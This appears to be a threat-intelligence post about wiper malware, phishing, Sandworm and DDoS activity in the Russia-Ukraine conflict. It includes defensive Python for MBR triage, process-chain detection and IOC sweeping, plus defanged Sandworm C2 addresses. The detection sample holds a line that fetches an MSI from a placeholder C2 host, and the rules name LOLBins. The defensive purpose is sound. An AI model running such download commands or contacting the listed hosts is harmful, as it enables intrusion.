
Ongoing Cyberwarfare: A Look at the Key Cyberattacks

With geopolitical tensions at an all-time high, the ongoing crisis has spawned a series of targeted cyberattacks between the two countries and the rest of the world. Security researchers at Cyble Research Labs have compiled a list of critical incidents in the escalating Russia-Ukraine conflict. Following are some of the emerging cyber threats affecting both nations.

Hermetic Malware

In a joint advisory, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) warned organizations about two destructive malware types attacking Ukrainian organizations. The first, the WhisperGate wiper, was identified by Microsoft in January 2022; refer to Cyble Research Labs' analysis of that malware for more details. In February, researchers at ESET, a Slovakia-based internet security company, found a new wiper malware family whose components go by the names HermeticWizard, HermeticWiper, and HermeticRansom. The Hermetic malware family was discovered shortly after Russia attacked Ukraine on February 24, 2022. The digital certificate used by the malware is issued to Hermetica Digital Limited, as shown below in Figure 1.

Figure 1: Digital Certificate

HermeticWizard

HermeticWizard is a dropper containing three different files embedded into its resource section. The first embedded file is the HermeticWiper executable. The remaining two are Dynamic Link Library (DLL) files used for spreading the wiper malware. The HermeticWizard malware strain spreads with the help of Windows Management Instrumentation (WMI) and Server Message Block (SMB) and is executed with the help of rundll32.exe/regsvr32.exe. The malware drops and runs the HermeticWiper on the victim machine upon successful infection.

HermeticWiper

The main objective of HermeticWiper is to make the victim system inaccessible by overwriting the Master Boot Record (MBR). Our analysis showed that the HermeticWiper has compressed driver files embedded in the resource section.

Figure 2: Embedded Drivers in the Resource

Based on the operating system version, the malware decompresses one of the above drivers and installs it on the machine before the system reboots. The driver is then used on the compromised machine to interact with the file system without going through the Windows API, which lets the malware corrupt the physical drive directly. In this attack, the attackers were seen abusing a benign driver file, empntdrv.sys.

Finally, the malware enumerates the physical drive from 0-100 and corrupts the MBR for every physical drive it encounters. The figure below shows the boot manager screen after corrupting the MBR.

Figure 3: Error Message for the Windows Boot Manager Failure
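As an added example (not Cyble's code, and not the wiper's), the following Python helper parses the 512-byte Master Boot Record that HermeticWiper overwrites. It checks the 0x55AA boot signature and decodes the four partition entries so a responder can classify a captured first sector as intact, zero-filled, or otherwise damaged, and it records a SHA-256 of the sector for comparison against a stored baseline. The sample MBR it builds is constructed; the read_first_sector helper and the device paths it mentions are assumptions about where a real sector would be read from.

```python
"""Sanity-check a 512-byte Master Boot Record (MBR) sector.

HermeticWiper and IsaacWiper overwrite the MBR of every physical drive they
can enumerate.  This helper parses an MBR image, verifies the boot signature
and the partition table, and classifies the sector as intact, wiped (all
zero) or damaged, so a disk image or a live first sector can be triaged.
Added example; not code from the original report.
"""
import hashlib
import struct

SECTOR_SIZE = 512
PARTITION_TABLE_OFFSET = 446
BOOT_SIGNATURE = b"\x55\xaa"


def parse_partition_table(sector: bytes) -> list:
    """Decode the four 16-byte partition entries that precede the signature."""
    entries = []
    for i in range(4):
        offset = PARTITION_TABLE_OFFSET + 16 * i
        # status(1) chs_start(3) type(1) chs_end(3) lba_start(4) sectors(4)
        status, ptype, lba_start, sectors = struct.unpack_from(
            "<B3xB3xII", sector, offset)
        entries.append({
            "bootable": status == 0x80,
            "type": ptype,
            "lba_start": lba_start,
            "sectors": sectors,
        })
    return entries


def assess_mbr(sector: bytes) -> dict:
    """Classify an MBR sector as 'intact', 'wiped' or 'damaged'."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("an MBR is exactly %d bytes" % SECTOR_SIZE)
    signature_ok = sector[-2:] == BOOT_SIGNATURE
    partitions = parse_partition_table(sector)
    used = [p for p in partitions if p["type"] != 0 and p["sectors"] > 0]
    if not any(sector):
        verdict = "wiped"       # zero-filled: typical of a disk structure wipe
    elif not signature_ok or not used:
        verdict = "damaged"     # signature gone, or no usable partition entry
    else:
        verdict = "intact"
    return {
        "verdict": verdict,
        "signature_ok": signature_ok,
        "partitions": used,
        "sha256": hashlib.sha256(sector).hexdigest(),  # for baseline comparison
    }


def read_first_sector(device_path: str) -> bytes:
    r"""Read the first 512 bytes of a raw device or disk image (assumed usage).

    On Windows a raw disk is opened as \\.\PhysicalDrive0 (administrator
    rights required); on Linux, /dev/sda or a dd image works the same way.
    """
    with open(device_path, "rb") as fh:
        return fh.read(SECTOR_SIZE)


def build_sample_mbr() -> bytes:
    """Constructed MBR image: a stub boot code and one bootable NTFS partition."""
    boot_code = b"\x33\xc0\x8e\xd0\xbc\x00\x7c" + b"\x00" * (PARTITION_TABLE_OFFSET - 7)
    entry = struct.pack("<B3sB3sII", 0x80, b"\x20\x21\x00", 0x07,
                        b"\xfe\xff\xff", 2048, 1048576)
    empty_entries = b"\x00" * 48
    return boot_code + entry + empty_entries + BOOT_SIGNATURE


if __name__ == "__main__":
    for label, image in [("sample", build_sample_mbr()),
                         ("zeroed", bytes(SECTOR_SIZE)),
                         ("garbage", b"\xaa" * SECTOR_SIZE)]:
        print(label, assess_mbr(image)["verdict"])
```

A zero-filled sector is reported separately from a merely corrupted one because the two point at different tooling: a structure wipe leaves nothing to recover from the MBR itself, whereas a sector with a valid signature but an empty table may still carry a recoverable boot loader.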

HermeticRansom

HermeticRansom is written in the Go Language, and it has been reported that the HermeticRansom and HermeticWiper campaigns commenced in Ukraine at about the same time. Researchers at ESET mentioned that the HermeticRansom is used to hide the execution of the HermeticWiper in the targeted system. Upon successful execution, the ransom note shown below is displayed to victims.

Figure 4: Ransom Note (Source: welivesecurity)

IsaacWiper

IsaacWiper is another wiper malware, observed in the Ukrainian government network, that wipes out the MBR. It can be either a DLL or an EXE file, dropped and executed from the %programdata% or system32 location. The IsaacWiper file was compiled on October 19, 2021, indicating that the malware may have been used in earlier attacks. Similar to HermeticWiper, IsaacWiper enumerates the physical drives and wipes out the MBR to make the system inaccessible.

Mass Phishing Attacks

On February 25, 2022, the Twitter account of the State Service Communications and Information Protection of Ukraine (SSSCIP) warned of a mass phishing attack targeting Ukrainians through emails carrying attachments of uncertain nature. A screenshot of the phishing email was also shared by the SSSCIP, as shown in Figure 5.

Figure 5: SSSCIP statement on Twitter

In another event, the CERT-UA shared a Facebook post informing about mass phishing emails targeting the private accounts of Ukrainian military personnel and related individuals.

The phishing emails were observed to carry a malicious Excel file with an embedded macro as the attachment. Upon execution, the macro code downloads an MSI package from the command-and-control (C2) server and executes it. The final MSI installer payload exfiltrates system data to the C2 server and executes commands received from it.
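The two delivery chains described on this page, an Office macro launching an MSI download and HermeticWizard's WMI-driven execution through rundll32.exe/regsvr32.exe, both leave a distinctive parent/child process pair in endpoint telemetry. The following Python is an added detection example (not Cyble's or any vendor's rule) that runs three such rules over constructed, Sysmon-like process-creation events; the field names, file paths, dropped.dll and the c2.example.invalid URL are placeholders, not indicators from the report.

```python
"""Flag process-creation events matching two delivery chains:
an Office document whose macro launches msiexec to fetch a remote MSI, and
WMI-driven remote execution that lands in rundll32.exe/regsvr32.exe.

Added example, not code from the original report.  Events are a constructed,
Sysmon-like subset (parent image, image, command line); map real telemetry
onto these three fields.
"""
import ntpath
import re

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"msiexec.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe",
           "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
WMI_HOST = "wmiprvse.exe"          # WmiPrvSE.exe parents processes started via WMI
URL_IN_CMDLINE = re.compile(r"https?://", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path; ntpath handles backslashes on any OS."""
    return ntpath.basename(path).lower()


def classify(event: dict) -> list:
    """Return the rule names an event triggers (empty list if nothing fires)."""
    parent = basename(event["parent_image"])
    image = basename(event["image"])
    cmdline = event.get("command_line", "")
    hits = []
    if parent in OFFICE_APPS and image in LOLBINS:
        hits.append("office_spawns_lolbin")
    if image == "msiexec.exe" and URL_IN_CMDLINE.search(cmdline):
        hits.append("msiexec_remote_package")
    if parent == WMI_HOST and image in LOLBINS:
        hits.append("wmi_spawned_lolbin")
    return hits


def scan(events: list) -> list:
    """Run every rule over every event; return (index, rules) for hits only."""
    results = []
    for index, event in enumerate(events):
        rules = classify(event)
        if rules:
            results.append((index, rules))
    return results


# Constructed sample telemetry; host paths, DLL name and URL are placeholders.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": "msiexec.exe /i http://c2.example.invalid/update.msi /qn"},
    {"parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe C:\ProgramData\dropped.dll,#1"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "command_line": r'"EXCEL.EXE" C:\Users\alice\Documents\budget.xlsx'},
    {"parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": "msiexec.exe /V"},
]

if __name__ == "__main__":
    for index, rules in scan(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["command_line"], rules)
```

The last two sample events are the benign controls: a user opening a spreadsheet from Explorer, and the Windows Installer service being started by services.exe, neither of which should fire. Parent/child matching on file names is deliberately simple; in production, pair it with the command-line and signer fields your sensor provides.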

Sandworm APT

In addition to the disruptive cyberattacks against organizations in Ukraine, the country is also being targeted by the Russian Advanced Persistent Threat (APT) group Sandworm. The group has been active since May 2017 and can be attributed to Russia's General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST), military unit 74455.

The Sandworm APT group has been using the VPNFilter framework to carry out operations against Ukrainian targets. This framework exploits network devices, primarily small office/home office (SOHO) routers and network-attached storage (NAS) devices.

In a recent advisory, CISA warned about a new malware named Cyclops Blink that has been added to the Sandworm APT group's arsenal. It is a modular malware framework for targeting network devices. Though the primary target of Cyclops Blink has been WatchGuard devices, we believe that the Sandworm group has the ability to compile the malware to target other devices as well.

DDoS Attacks on Russian State and Private Websites

Researchers at Cyble identified a website offering a range of tools and techniques to perform DDoS attacks against Russian websites. The website appears to be driven by the ongoing geopolitical tension and also encourages mass reporting of pro-Russian social media accounts.

The website provides Python scripts to perform DDoS attacks on target websites from Windows, Linux, and macOS platforms. Users can modify the scripts to change the targets, so the same scripts could be turned against other targets in the future. Figure 6 shows the homepage of the website.

Figure 6: Website Providing Tools for DDoS Attacks in Russia

Amid the intensifying tensions, another hacktivist group, GhostSec (Ghost Security), declared its support for Ukraine and announced that it had flooded Russian military websites with DDoS attacks.

Figure 7: GhostSec Declaration of DDoS

Industrial Control Systems Attacks

The Industrial Control Systems (ICS) of both Russia and Ukraine are being heavily targeted by cyberattacks, as each country attempts to cripple the industrial cyberinfrastructure of the other.

Supervisory Control and Data Acquisition (SCADA) is the largest subgroup of ICS. SCADA systems are the central systems used to monitor and operate plant processes. A single successful cyberattack on SCADA can bring a plant's operations to a standstill. As SCADA is mostly deployed inside industrial environments, a malfunction in such a system can also result in tremendous damage, ranging from physical damage to the plant to loss of life.

On March 2, the hacktivist group Anonymous claimed to have compromised the Dubna Bypass Module to gain access to the monitoring system of a nuclear reactor managed by the Joint Institute for Nuclear Research (JINR), Russia.

Figure 8: Image Shared by Anonymous Group

Conclusion

There is little doubt that sophisticated cyber weapons are key tools in the arsenal of a modern military. Nation-states and sympathetic hacktivists are targeting government assets, critical infrastructure, and private sector organizations. The operational technology, banking, financial services and insurance (BFSI), and media sectors are highly lucrative targets for attackers. With Russia and Ukraine being targeted by a barrage of cyberattacks, it has become even more evident that targeted cyber warfare will continue to be deployed as global tensions intensify.

Our researchers are continuously gathering more information on the latest cyberattacks, and we will keep updating this space as and when we have more information.

MITRE ATT&CK® Techniques

Tactic | Technique ID | Technique Name
Resource Development | T1588.002 | Obtain Capabilities: Tool
Resource Development | T1588.003 | Obtain Capabilities: Code Signing Certificates
Initial Access | T1078.002 | Valid Accounts: Domain Accounts
Initial Access | T1059.003 | Command and Scripting Interpreter: Windows Command Shell
Execution | T1106 | Native API
Execution | T1569.002 | System Services: Service Execution
Execution | T1047 | Windows Management Instrumentation
Discovery | T1018 | Remote System Discovery
Lateral Movement | T1021.002 | Remote Services: SMB/Windows Admin Shares
Lateral Movement | T1021.003 | Remote Services: Distributed Component Object Model
Impact | T1561.002 | Disk Wipe: Disk Structure Wipe
Impact | T1561.001 | Disk Wipe: Disk Content Wipe
Impact | T1485 | Data Destruction
Impact | T1499.002 | Endpoint Denial of Service: Service Exhaustion Flood

Indicators Of Compromise (IOCs)

Indicator | Indicator type | Description
84ba0197920fd3e2b7dfa719fee09d2f | MD5 | HermeticWiper
912342f1c840a42f6b74132f8a7c4ffe7d40fb77 | SHA1 | HermeticWiper
0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da | SHA256 | HermeticWiper
382fc1a3c5225fceb672eea13f572a38 | MD5 | HermeticWiper
d9a3596af0463797df4ff25b7999184946e3bfa2 | SHA1 | HermeticWiper
2c10b2ec0b995b88c27d141d6f7b14d6b8177c52818687e4ff8e6ecf53adf5bf | SHA256 | HermeticWiper
decc2726599edcae8d1d1d0ca99d83a6 | MD5 | HermeticWiper
0d8cc992f279ec45e8b8dfd05a700ff1f0437f29 | SHA1 | HermeticWiper
3c557727953a8f6b4788984464fb77741b821991acbf5e746aebdd02615b1767 | SHA256 | HermeticWiper
3f4a16b29f2f0532b7ce3e7656799125 | MD5 | HermeticWiper
61b25d11392172e587d8da3045812a66c3385451 | SHA1 | HermeticWiper
1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591 | SHA256 | HermeticWiper
5d1122d01501e65a718e565178b301a8 | MD5 | HermeticWiper
5ba988916d175d5887fb200b8c15a7e76e1fbd20 | SHA1 | HermeticWiper
4aa186b5fdcc8248a9672bf21241f77dd395872ec4876c90af5d27ae565e4cb7 | SHA256 | HermeticWiper
f1a33b2be4c6215a1c39b45e391a3e85 | MD5 | HermeticWiper
9518e4ae0862ae871cf9fb634b50b07c66a2c379 | SHA1 | HermeticWiper
06086c1da4590dcc7f1e10a6be3431e1166286a9e7761f2de9de79d7fda9c397 | SHA256 | HermeticWiper
d5d2c4ac6c724cd63b69ca054713e278 | MD5 | HermeticRansom
f32d791ec9e6385a91b45942c230f52aff1626df | SHA1 | HermeticRansom
4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382 | SHA256 | HermeticRansom
ecce8845921a91854ab34bff2623151e | MD5 | IsaacWiper
736a4cfad1ed83a6a0b75b0474d5e01a3a36f950 | SHA1 | IsaacWiper
13037b749aa4b1eda538fda26d6ac41c8f7b1d02d83f47b0d187dd645154e033 | SHA256 | IsaacWiper
6c10466ad7c153e7f949fa3c6600b6ac | MD5 | IsaacWiper
5d009f79383a81622eefd8b183efb23fbf96a62f | SHA1 | IsaacWiper
7bcd4ec18fc4a56db30e0aaebd44e2988f98f7b5d8c14f6689f650b4f11e16c0 | SHA256 | IsaacWiper
6983f7001de10f4d19fc2d794c3eb534 | MD5 | RemCom remote access tool
23873bf2670cf64c2440058130548d4e4da412dd | SHA1 | RemCom remote access tool
3c2fe308c0a563e06263bbacf793bbe9b2259d795fcc36b953793a7e499e7f71 | SHA256 | RemCom remote access tool
100.43.220[.]234 | IPv4 address | Sandworm C2 server IP address
96.80.68[.]193 | IPv4 address | Sandworm C2 server IP address
188.152.254[.]170 | IPv4 address | Sandworm C2 server IP address
208.81.37[.]50 | IPv4 address | Sandworm C2 server IP address
70.62.153[.]174 | IPv4 address | Sandworm C2 server IP address
2.230.110[.]137 | IPv4 address | Sandworm C2 server IP address
90.63.245[.]175 | IPv4 address | Sandworm C2 server IP address
212.103.208[.]182 | IPv4 address | Sandworm C2 server IP address
50.255.126[.]65 | IPv4 address | Sandworm C2 server IP address
78.134.89[.]167 | IPv4 address | Sandworm C2 server IP address
81.4.177[.]118 | IPv4 address | Sandworm C2 server IP address
24.199.247[.]222 | IPv4 address | Sandworm C2 server IP address
37.99.163[.]162 | IPv4 address | Sandworm C2 server IP address
37.71.147[.]186 | IPv4 address | Sandworm C2 server IP address
105.159.248[.]137 | IPv4 address | Sandworm C2 server IP address
80.155.38[.]210 | IPv4 address | Sandworm C2 server IP address
217.57.80[.]18 | IPv4 address | Sandworm C2 server IP address
151.0.169[.]250 | IPv4 address | Sandworm C2 server IP address
212.202.147[.]10 | IPv4 address | Sandworm C2 server IP address
212.234.179[.]113 | IPv4 address | Sandworm C2 server IP address
185.82.169[.]99 | IPv4 address | Sandworm C2 server IP address
93.51.177[.]66 | IPv4 address | Sandworm C2 server IP address
80.15.113[.]188 | IPv4 address | Sandworm C2 server IP address
80.153.75[.]103 | IPv4 address | Sandworm C2 server IP address
109.192.30[.]125 | IPv4 address | Sandworm C2 server IP address
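To make the table above directly usable, here is an added Python example (not Cyble's tooling) that refangs the defanged IPs, sweeps firewall and proxy log lines with boundary-safe matching so that a listed address cannot match inside a longer one, and looks up MD5/SHA1/SHA256 digests of file content. It carries only a subset of the page's indicators, copied verbatim from the table; the log lines and the file content it hashes are constructed samples, and the 10.x and 203.0.113.x addresses in them are placeholders.

```python
"""Sweep log lines and file hashes against indicators from the table above.

Added example, not code from the original report.  The indicator values are
copied from the page's IOC table (IPs kept defanged as printed); only a subset
is embedded here, so load the full list from a file in practice.  The log
lines and file content below are constructed samples.
"""
import hashlib
import re
from typing import Optional

HASH_IOCS = {  # digest (lower-case hex) -> description, as printed on the page
    "84ba0197920fd3e2b7dfa719fee09d2f": "HermeticWiper",
    "912342f1c840a42f6b74132f8a7c4ffe7d40fb77": "HermeticWiper",
    "0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da": "HermeticWiper",
    "4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382": "HermeticRansom",
    "13037b749aa4b1eda538fda26d6ac41c8f7b1d02d83f47b0d187dd645154e033": "IsaacWiper",
}
DEFANGED_IPS = [  # subset of the Sandworm C2 addresses listed above
    "100.43.220[.]234", "96.80.68[.]193", "188.152.254[.]170", "208.81.37[.]50",
]


def refang(indicator: str) -> str:
    """Turn the printed form 1.2.3[.]4 back into a matchable address."""
    return indicator.replace("[.]", ".")


def defang(indicator: str) -> str:
    """Inverse of refang, for writing matches back into reports and tickets."""
    head, last = indicator.rsplit(".", 1)
    return head + "[.]" + last


def build_ip_pattern(defanged: list) -> "re.Pattern":
    """One regex for all IPs; the look-arounds stop 96.80.68.193 matching 196.80.68.193."""
    alternatives = "|".join(re.escape(refang(ip)) for ip in defanged)
    return re.compile(r"(?<![\d.])(?:%s)(?![\d.])" % alternatives)


IP_PATTERN = build_ip_pattern(DEFANGED_IPS)


def sweep_logs(lines: list) -> list:
    """Return (line_number, matched_ip) for every line carrying a listed IP."""
    hits = []
    for number, line in enumerate(lines, 1):
        for match in IP_PATTERN.finditer(line):
            hits.append((number, match.group(0)))
    return hits


def lookup_hash(digest: str) -> Optional[str]:
    """Normalise case and whitespace before the lookup; return the description or None."""
    return HASH_IOCS.get(digest.strip().lower())


def lookup_file_bytes(data: bytes) -> Optional[str]:
    """Hash content with the three algorithms used in the table and look each up."""
    for algorithm in ("md5", "sha1", "sha256"):
        hit = lookup_hash(hashlib.new(algorithm, data).hexdigest())
        if hit:
            return hit
    return None


# Constructed log lines; line 2 is a deliberate near-miss (196.80.68.193).
SAMPLE_LOGS = [
    "2022-03-01T09:12:04Z fw src=10.20.1.15 dst=100.43.220.234 dport=443 action=allow",
    "2022-03-01T09:12:09Z fw src=10.20.1.15 dst=196.80.68.193 dport=443 action=allow",
    "2022-03-01T09:13:11Z proxy client=10.20.1.22 url=http://96.80.68.193/ status=200",
    "2022-03-01T09:14:00Z fw src=10.20.1.30 dst=203.0.113.7 dport=443 action=allow",
]

if __name__ == "__main__":
    for number, ip in sweep_logs(SAMPLE_LOGS):
        print("line %d: %s" % (number, defang(ip)))
    print(lookup_file_bytes(b"constructed benign file content"))
```

The near-miss on the second sample line is the case a naive substring search gets wrong; the look-arounds in build_ip_pattern reject any match that is preceded or followed by a digit or a dot. Hash lookups are normalised to lower case because hashes are sometimes printed in mixed case, as two entries in the table above are.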

Our Recommendations

  • Keep the operating system and installed software on workstations and servers updated.
  • Minimize network exposure for all serial devices by using network segmentation and placing serial devices behind network firewalls so that they are not accessible from the Internet.
  • Conduct regular backups and keep the backups offline or on a separate network.
  • Use the security solutions available for Linux and IoT devices.
  • Refrain from opening untrusted links and email attachments without verifying their authenticity.
  • Create and store your passwords with a password manager.
  • Change the default passwords on all internet-connected devices.